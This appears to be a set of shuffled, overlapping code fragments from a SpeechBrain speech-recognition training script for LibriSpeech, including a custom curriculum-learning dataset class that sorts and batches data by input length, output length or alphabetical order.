"avg_valid_loss ) # Debug mode only runs a few batches if self.debug and", "select_n=None, reverse=False ): \"\"\"Returns a list of data ids, filtered and sorted using", "the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss , loss_ctc, loss_seq def fit_batch(self,", "= False # elif hparams[\"sorting\"] == \"random\": # pass # else: # raise", "\"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt", "output probabilities.\"\"\" batch = batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos, _ = batch.tokens_bos", "train.py hparams/conformer.yaml With the default hyperparameters, the system employs a convolutional frontend and", "* \"input_length:asc,output_length:desc\" - Sort the dataset using ``input_length`` in ascending order , tie", "needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\",", "files, you can try different encoders, decoders, tokens (e.g, characters instead of BPE),", "preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\":", "returned data points as equal, continue # comparing using the next key, else", "asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for k in test_datasets.keys(): #", "`random`, `sorted`, `reverse-sorted` - Example: * \"random\" - After dataset is ordered based", "sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets = [train_data,", "and creates a dictionary out of it\"\"\" ordering_info = [] orderings = dataset_order.split(\",\")", "ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN stage is handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset,", "* 1 - key1 > key2 * -1 - key1 < key2 *", "Map from data_id to weight, these weight(s) will be used to sort the", "the intermediate checkpoints # ACC is set to 1.1 so checkpointer only keeps", "return res shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for index,id", "# csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # ) train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, )", "with torch.no_grad(): for batch in tqdm( valid_set, dynamic_ncols=True, disable=not enable ): self.step +=", "None: # do not reload the weights if training is interrupted right before", "== 0: # gradient clipping & early stop if loss is not fini", "self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit( self, epoch_counter, train_set, valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ):", "datasets objects as well as tokenization and encoding train_data, valid_data, test_datasets, tokenizer =", "Decoding is performed with (CTC/Att joint) beamsearch coupled with a neural language model.", "`Brain` class is the implementation of the ``fit()`` method, which iterates epochs and", "from HuggingFace (or elsewhere depending on # # the path given in the", "batch_size=8, select_n=None, ): \"\"\"Get a filtered and/or sorted version of this based on", "on them. opt_class : torch.optim class A torch optimizer constructor that has takes", "and will have the optimizer added to continue training if interrupted. inter_epoch_dataset_updation :", "the initialization was done with distributed_count > 0 and the distributed_backend is ddp,", "as basic recognition tokens. Training is performed on the full LibriSpeech dataset (960", "assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise shuffling gone wrong.\" weights = {}", "return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None,", "method. hparams : dict Each key:value pair should consist of a string key", "valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for k in test_datasets.keys(): # keys are", "= self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage == sb.Stage.TRAIN: if hasattr(self.hparams,", "transformer. The decoder is based on a Transformer decoder. Beamsearch coupled with a", "of random, sorted, weighted_sorted.\" ) # create Dataloader using the weights filtered_sorted_ids =", "hyperparameters, the system employs a convolutional frontend and a transformer. The decoder is", "data points found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static data,", "hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens, hyps def compute_objectives(self, predictions,", "if text1 > text2: return 1 elif text1 < text2: return -1 else:", "the end of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number", "mechanism between them. Decoding is performed with (CTC/Att joint) beamsearch coupled with a", "# 1. # Dataset prep (parsing Librispeech) from librispeech_prepare import prepare_librispeech # noqa", "from torch.utils.data import DataLoader from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import Stage import", "divide the dataset into batches. This helps in ordering the dataset at batch", "self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start() self.train_set = train_set total_steps = len(train_set)", "in t: # # print(batch.duration) # # print(batch.wrd) # # if cnt ==", "lr = self.hparams.lr_sgd steps = -1 optimizer = self.optimizer.__class__.__name__ epoch_stats = { \"epoch\":", "torch.cat([wavs, wavs_noise], dim=0) wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0) #", "( self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq ) if stage", "= [ tup[2] for tup in sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order(", "is None: progressbar = not self.noprogressbar # Iterate epochs for epoch in epoch_counter:", "it is False sortagrad: int Number of epochs, for which curriculum based dataset", "single dataset) the only methods that need to be overridden are: * ``compute_forward()``", "if self.train_sampler is not None and hasattr( self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch) # Time", "example below illustrates how overriding these two methods is done. For more complicated", "self.ckpt_interval_minutes > 0 and time.time() - last_ckpt_time >= self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt)", "batches\"\"\" with torch.no_grad(): predictions = self.compute_forward(batch, stage=stage) loss, _, _ = self.compute_objectives(predictions, batch,", "which takes feedback from model and reshuffles the dataset. By, default, it is", ">= limit key_max_value : dict Map from key (in data or in dynamic", "Iterate epochs for epoch in epoch_counter: # Training stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() #", "give user some idea of how the AM is doing hyps, _ =", "are test_clean, test_other etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate(", "sb.utils.distributed.ddp_init_group(run_opts) # 1. # Dataset prep (parsing Librispeech) from librispeech_prepare import prepare_librispeech #", "Reset nonfinite count to 0 each epoch self.nonfinite_count = 0 if self.train_sampler is", "None, int If not None, will only keep data_point if weight[data_point] > min_weight", "method. This behavior can be changed by overriding the ``configure_optimizers()`` method. hparams :", "language model. To run this recipe, do the following: > python train.py hparams/transformer.yaml", "be used to sort the dataset. ordering_info : str Information to create weights", "current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if ( current_epoch % valid_search_interval == 0", "are not saved. checkpointer : speechbrain.Checkpointer By default, this will be used to", "updated every between epochs or not. It is used in CL which takes", "not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad(): for batch in", "Dataset prep (parsing Librispeech) from librispeech_prepare import prepare_librispeech # noqa # Create experiment", "enable, ) as t: for batch in t: self.step += 1 global_step =", "res *= order # If comparison using `key` returned data points as equal,", "# Reset nonfinite count to 0 each epoch self.nonfinite_count = 0 if self.train_sampler", "self.optimizer.zero_grad() # anneal lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach() def", "if min_value == None and max_value == None: return weights if isinstance(min_value,int): min_value", "self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number of epochs for which curriculum must", "+= data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise sorting gone wrong.\" weights", "only the list of parameters (e.g. a lambda or partial function definition). By", "import torch from torch.utils.tensorboard import SummaryWriter import sys import logging from pathlib import", "key_max_value : dict Map from key (in data or in dynamic items) to", "== select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for tup in sorted(filtered_ids, reverse=reverse)", "type can be random, sorted # keys for ordering info can be ,", "in `ordering_info` in string as input and creates a dictionary out of it\"\"\"", "DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler from tqdm.contrib import tqdm import numpy as", "data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights = {}", "on_fit_start(self): \"\"\"Initialize the right optimizer on the training start\"\"\" super().on_fit_start() # if the", "FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler from tqdm.contrib import tqdm import numpy as np", "order: `asc`, `desc` - Example: * \"input_length:asc,output_length:desc\" - Sort the dataset using ``input_length``", "with Byte Pairwise Encoding (BPE) are used as basic recognition tokens. Training is", "are used and expected to have a certain behavior: * ``fit_batch()`` * ``evaluate_batch()``", "curriculum, shares static data. The reason to implement these operations in the same", "weights = self._random_shuffled_batches(weights, batch_size) elif batch_selection == \"sorted\": pass elif batch_selection == \"reverse-sorted\":", "duration2: return -1 else: return 0 def _output_length_comparator( self, key1, key2 ): \"\"\"Compare", "self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle the dataset at batch level\"\"\" data_ids", "\"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, ) # here we create the datasets objects", "A torch optimizer constructor that has takes only the list of parameters (e.g.", "def text_pipeline(wrd): yield wrd tokens_list = tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] +", "torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq = self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc,", "SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def compute_forward(self, batch, stage): \"\"\"Forward computations from the waveform batches", "shuffling return else: # recreate dataset using preferred cl approach return else: #", "for index,id in enumerate(sorted_data_ids): weights[id] = index return weights def _input_length_comparator( self, key1,", "> self.hparams.stage_one_epochs: del self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters()) # Load latest checkpoint to resume", "= train_data.filtered_sorted(sort_key=\"duration\") # # when sorting do not shuffle in dataloader ! otherwise", "ordering_info = [] orderings = dataset_order.split(\",\") for order in orderings: if order.strip() ==", "def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle the dataset at batch", "self.hparams.log_softmax(pred) # Compute outputs hyps = None if stage == sb.Stage.TRAIN: hyps =", "len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise shuffling gone", "pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"descending\": # train_data =", "the range (`min_value`, `max_value`)\"\"\" if min_value == None and max_value == None: return", "): \"\"\"Get a filtered and/or sorted version of this based on specified curriculum,", "model is used on the top of decoder probabilities. The neural network is", "items) to func, will only keep data_point if bool(func(data_point[key])) == True min_weight :", "self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters()) # Load latest checkpoint to resume training if interrupted", "key and a hyperparameter that is used within the overridden methods. These will", "NotImplementedError( \"Ordering Type must be one of random, sorted, weighted_sorted.\" ) # create", "self.avg_train_loss = 0.0 self.step = 0 # Validation stage if valid_set is not", "used. It can take one of three values * ``-1`` - Use curriculum", "epoch, \"lr\": lr, \"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, )", "for batch in tqdm( valid_set, dynamic_ncols=True, disable=not enable ): self.step += 1 loss", "\"fitting\" a set of modules to a set of data. In order to", "will be used to sort the dataset. ordering_info : str Information to create", "called at the beginning of each epoch\"\"\" if stage != sb.Stage.TRAIN: self.acc_metric =", "of a string key and a hyperparameter that is used within the overridden", "with (CTC/Att joint) beamsearch coupled with a neural language model. To run this", "continue # comparing using the next key, else return the result if res", ") # Debug mode only runs a few batches if self.debug and self.step", "reshuffles the dataset. By, default, it is False sortagrad: int Number of epochs,", "def compare(key1,key2): \"\"\" Comparing logic, as `ordering_info` can contain multiple keys Note: Value", "\"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\" ) def text_pipeline(wrd): yield wrd tokens_list = tokenizer.encode_as_ids(wrd)", "order = 1 if ordering[\"order\"] == \"asc\" else -1 if key == \"input_length\":", "python train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With the default hyperparameters, the system", "for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) # compute the accuracy of the", "is based on a Transformer decoder. Beamsearch coupled with a Transformer language model", "progressbar if requested and main_process enable = progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch", "can be random, sorted # keys for ordering info can be , input_length,", "to give user some idea of how the AM is doing hyps, _", "- key1 > key2 * -1 - key1 < key2 * 0 -", "index return weights def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle the", "- 1) * total_steps with tqdm( self.train_set, initial=self.step, dynamic_ncols=True, disable=not enable, ) as", "Batchwise sorting gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] =", "We get the tokenizer as we need it to encode the labels when", "takes feedback from model and reshuffles the dataset. By, default, it is False", "mini-batches. tokenizer = hparams[\"tokenizer\"] # 2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav):", "if stage == sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs =", ": str Information on how to order batches. - Possible Values are `contiguous`,", "* <NAME> 2020 * <NAME> 2020 * <NAME> 2021 \"\"\" import os import", "epoch: # recreate dataset using random shuffling return else: # recreate dataset using", "wavs, wav_lens = batch.sig tokens_bos, _ = batch.tokens_bos # Add augmentation if specified", "== \"random\": weights = self._random_shuffled_batches(weights, batch_size) elif batch_selection == \"sorted\": pass elif batch_selection", "(p_ctc, p_seq, wav_lens, hyps,) = predictions ids = batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos", "\"\"\"Takes in `ordering_info` in string as input and creates a dictionary out of", "current_epoch = self.hparams.epoch_counter.current current_optimizer = self.optimizer if current_epoch > self.hparams.stage_one_epochs: del self.optimizer self.optimizer", "(CTC/Att joint) beamsearch coupled with a neural language model. To run this recipe,", "* <NAME> 2021 \"\"\" import os import torch from torch.utils.tensorboard import SummaryWriter import", "is the implementation of the ``fit()`` method, which iterates epochs and datasets for", "hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, )", "= [ tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq in hyps ] target_words = [wrd.split(\" \")", "return True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids =", "= [] with self.output_keys_as(temp_keys): for i, data_id in enumerate(data_ids): data_point = self.data[data_id] data_point[\"id\"]", "comparison using `key` returned data points as equal, continue # comparing using the", "< epoch: # recreate dataset using random shuffling return else: return def check_and_reset_optimizer(self):", "these are not saved. checkpointer : speechbrain.Checkpointer By default, this will be used", "from Adam to SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch, sb.Stage.TRAIN) loss, loss_ctc, loss_seq =", "on output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if length1 > length2:", "stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w) # save", "the filtering criteria\"\"\" for key, limit in key_min_value.items(): if computed[key] >= limit: continue", "be overridden. The following methods are used and expected to have a certain", "Authors * <NAME> 2020 * <NAME> 2020 * <NAME> 2020 * <NAME> 2020", "self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage == sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"): feats = self.hparams.augmentation(feats)", "is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"descending\": # train_data", "from tqdm.contrib import tqdm import numpy as np from functools import cmp_to_key from", "It can take one of three values * ``-1`` - Use curriculum learning", "is given, it is used directly. valid_set : Dataset, DataLoader A set of", "str Information to create weights based on pre-defined keys( and/or methods) and their", "sorting steps don't need to compute the dynamic items twice. Arguments --------- key_min_value", "to run in debug mode, Default ``2``. If a non-positive number is passed,", "self.train_sampler.set_epoch(epoch) # Time since last intra-epoch checkpoint last_ckpt_time = time.time() # Only show", "for each device and only saving a checkpoint on the main process. Arguments", "Shares the static data, but has its own output keys and dynamic items", "run. jit_module_keys (list of str) List of keys in ``modules`` that should be", "be overridden are: * ``compute_forward()`` * ``compute_objectives()`` The example below illustrates how overriding", "if valid_set is not None and not ( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader)", "ckpt_interval_minutes (float) Amount of time between saving intra-epoch checkpoints, in minutes, default: ``15.0``.", "int If not None, will only keep data_point if weight[data_point] > min_weight max_weight", "= sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides(", "approach return else: # recreate dataset using preferred cl approach return else: if", "# 2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return", "The location for performing computations. auto_mix_prec (bool) If ``True``, automatic mixed-precision is used.", "self.compute_forward(batch, stage=stage) loss, _, _ = self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def on_stage_start(self,", "batch_selection == \"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering Type must", "datasets for the purpose of \"fitting\" a set of modules to a set", "\"\"\"Compare two data points based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2 =", "otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"descending\": #", "fin: hparams = load_hyperpyyaml(fin, overrides) # If distributed_launch=True then # create ddp_group with", "Options for keys: `input_length`, `output_length`, `alphabetic` - Options for order: `asc`, `desc` -", "loss_seq.detach() def evaluate_batch(self, batch, stage): \"\"\"Computations needed for validation/test batches\"\"\" with torch.no_grad(): predictions", "from last 5 epochs. The experiment file is flexible enough to support a", "epochs. The experiment file is flexible enough to support a large variety of", "if `weights` is None batch_selection : str Information on how to order batches.", "a dictionary out of it\"\"\" ordering_info = [] orderings = dataset_order.split(\",\") for order", "return weights filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids = [] for i, data_id in enumerate(weights.keys()):", "= sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self, key_min_value={},", "case (e.g., training a single model with a single dataset) the only methods", "0 - key1 = key2 \"\"\" for ordering in dataset_orderings: key = ordering[\"key\"]", "from speechbrain.dataio.sampler import ReproducibleRandomSampler from tqdm.contrib import tqdm import numpy as np from", "one), and many other possible variations. Authors * <NAME> 2020 * <NAME> 2020", "cases, such as multiple modules that need to be updated, the following methods", "\"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch},", "instead of BPE), training split (e.g, train-clean 100 rather than the full one),", "Add augmentation if specified if stage == sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise =", "disable=False, # ) as t: # cnt = 0 # for batch in", "overriding these two methods is done. For more complicated use cases, such as", "{\"loss\": stage_loss} if stage == sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] =", "own output keys and dynamic items (initially deep copied from this, so they", "<NAME> 2020 * <NAME> 2020 * <NAME> 2020 * <NAME> 2020 * <NAME>", "the dataset at batch level. select_n : None, int If not None, only", "last intra-epoch checkpoint last_ckpt_time = time.time() # Only show progressbar if requested and", "to support a large variety of different systems. By properly changing the parameter", "dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\",", "batch_selection : str Information on how to order batches. - Possible Values are", "None, will only keep data_point if weight[data_point] < max_weight weights : None, dict", "(1 - self.hparams.ctc_weight) * loss_seq ) if stage != sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current", "model with a single dataset) the only methods that need to be overridden", "else: # recreate dataset using preferred cl approach return else: # recreate dataset", "cnt = 0 # for batch in t: # # print(batch.duration) # #", "the dataset. By, default, it is False sortagrad: int Number of epochs, for", "and a transformer. The decoder is based on a Transformer decoder. Beamsearch coupled", "stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN stage is handled specially. dataloader = sb.dataio.dataloader.make_dataloader(", "librispeech_prepare import prepare_librispeech # noqa # Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides,", "example fulfills the filtering criteria\"\"\" for key, limit in key_min_value.items(): if computed[key] >=", "raise NotImplementedError( # \"sorting must be random, ascending or descending\" # ) valid_data", "is not None and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2]", "be random, sorted # keys for ordering info can be , input_length, output_length,", "* ``compute_objectives()`` The example below illustrates how overriding these two methods is done.", "self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss , loss_ctc, loss_seq def fit_batch(self, batch): \"\"\"Train the", "stage_loss, epoch): \"\"\"Gets called at the end of a epoch.\"\"\" # Compute/store important", "dynamic_ncols=True, # disable=False, # ) as t: # cnt = 0 # for", "turn off progressbar when training. Default: ``False``. ckpt_interval_minutes (float) Amount of time between", "to improve objective. Relies on the existence of multiple functions that can (or", "filtered_sorted_ids = [ tup[2] for tup in sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def", "= hparams[\"tokenizer\"] # 2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig =", "of the ``fit()`` method. This behavior can be changed by overriding the ``configure_optimizers()``", "import tqdm import numpy as np from functools import cmp_to_key from torch.utils.data import", "self.modules.CNN(feats) enc_out, pred = self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output layer", "= self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0 or (", "modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer ) # save attributes related to curriculum learning", "the `Brain` class is the implementation of the ``fit()`` method, which iterates epochs", "on_stage_start(self, stage, epoch): \"\"\"Gets called at the beginning of each epoch\"\"\" if stage", "as sb from hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset import", "pair should consist of a string key and a hyperparameter that is used", "batch, sb.Stage.TRAIN) # normalize the loss by gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward() if", "training a single model with a single dataset) the only methods that need", "all valid. valid_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making the valid_loader", "to switch optimizer # if so change the optimizer from Adam to SGD", "= float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"]) if duration1 > duration2: return 1 elif duration1", "constructor that has takes only the list of parameters (e.g. a lambda or", "that is used within the overridden methods. These will be accessible via an", "sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets", "only keep data_point if data_point[key] >= limit key_max_value : dict Map from key", "yield tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list +", "in key_test.items(): if bool(func(computed[key])): continue return False return True temp_keys = ( set(key_min_value.keys())", "- last_ckpt_time >= self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time() # Run", "filtering criteria\"\"\" for key, limit in key_min_value.items(): if computed[key] >= limit: continue return", "return ordering_info def _random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the data_ids in random order\"\"\"", "inter_epoch_dataset_updation : bool Whether dataset must be updated every between epochs or not.", "self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time() # Run train \"on_stage_end\" on", "import SummaryWriter import sys import logging from pathlib import Path import speechbrain as", "the same method is that computing some dynamic items may be expensive, and", "\"epoch\": epoch, \"lr\": lr, \"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats,", "a DataLoader is given, it is used directly. valid_set : Dataset, DataLoader A", "= time.time() # Run train \"on_stage_end\" on all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss", "TRAIN stage is handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader", "runtime environment, including debug (bool) If ``True``, this will only iterate a few", "stage == sb.Stage.VALID: hyps = None current_epoch = self.hparams.epoch_counter.current if current_epoch % self.hparams.valid_search_interval", "= self.hparams.valid_search_interval if ( current_epoch % valid_search_interval == 0 or stage == sb.Stage.TEST", "not DataLoader). E.G. batch_size, num_workers. DataLoader kwargs are all valid. valid_loader_kwargs : dict", "creating # mini-batches. tokenizer = hparams[\"tokenizer\"] # 2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\")", "and order these batches randomly to create final dataset batch_size : 8, int", "sorted # keys for ordering info can be , input_length, output_length, alphabetic dataset_ordering", "seq2seq log-probabilities pred = self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred) # Compute outputs hyps =", "We download the pretrained LM from HuggingFace (or elsewhere depending on # #", "# **hparams[\"valid_dataloader_opts\"] # ) # with tqdm( # train_set, # initial=0, # dynamic_ncols=True,", "One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The location for performing computations.", "sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={},", "= [train_data, valid_data] + [i for k, i in test_datasets.items()] # We get", "CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size =", "None, will only keep data_point if weight[data_point] > min_weight max_weight : None, int", "\"w\") as w: self.wer_metric.write_stats(w) # save the averaged checkpoint at the end of", "debug mode, Default ``2``. If a non-positive number is passed, all epochs are", "is used on the top of decoder probabilities. The neural network is trained", "functions.\"\"\" data_folder = hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, #", "tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos tokens = torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets,", "valid_data , # stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) # with tqdm(", "``2``. debug_epochs (int) Number of epochs to run in debug mode, Default ``2``.", "Number of epochs, for which curriculum based dataset be used. It can take", "entire dataset if ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\":", "need to be updated, the following methods can be overridden: * ``fit_batch()`` *", "Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) # with tqdm( # train_set, # initial=0, #", "self.step += 1 global_step = completed_steps + self.step loss, loss_ctc, loss_seq = self.fit_batch(batch)", "\"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return train_data, valid_data, test_datasets, tokenizer if __name__ == \"__main__\":", "method, which iterates epochs and datasets for the purpose of \"fitting\" a set", "input length\"\"\" duration1 = float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"]) if duration1 > duration2: return", "- Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted` - Example: * \"random\" -", "0 each epoch self.nonfinite_count = 0 if self.train_sampler is not None and hasattr(", "debug mode, 